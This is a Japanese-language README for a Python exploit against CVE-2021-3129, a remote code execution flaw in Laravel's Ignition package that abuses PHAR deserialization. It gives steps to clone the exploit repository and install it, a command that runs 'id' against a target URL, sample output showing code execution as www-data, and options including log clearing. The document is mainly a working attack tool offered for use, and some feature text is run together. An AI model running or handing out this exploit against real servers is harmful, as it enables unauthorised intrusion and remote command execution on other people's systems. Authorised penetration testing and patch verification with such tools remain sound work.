
CVE-2021-3129のPythonエクスプロイト。PHAR逆シリアル化を自動化して、脆弱なLaravel Ignitionエンドポイントで任意のコマンドを実行します。
これは、Laravel に Ignition パッケージがインストールされている場合のリモートコード実行脆弱性 CVE-2021-3129 に対する Python エクスプロイトスクリプトです。この脆弱性により、攻撃者は PHAR デシリアライゼーションを介して任意のシステムコマンドを実行できます。
phpggc を使用して PHAR ペイロードを自動生成id、whoami など)をユーザー入力として受け付けrequests ライブラリリポジトリをクローン:
git clone https://github.com/0x0d3ad/CVE-2021-3129.git
cd CVE-2021-3129
必要な Python パッケージをインストール:
pip install requests
対象の URL とコマンドを指定してスクリプトを実行:
python3 CVE-2021-3129.py http://example.com --cmd 'id'
出力例:
[+] Generating PHAR payload for command: id
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
[+] PHAR deserialized
---------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---------------------------------------
[+] Trying to clear logs
[+] Logs cleared
target(必須):脆弱な Laravel アプリケーションの URL。--cmd(オプション):対象で実行するコマンド(デフォルト:whoami)。--log_path(オプション):使用するログファイルのパス(デフォルト:../storage/logs/laravel.log)。
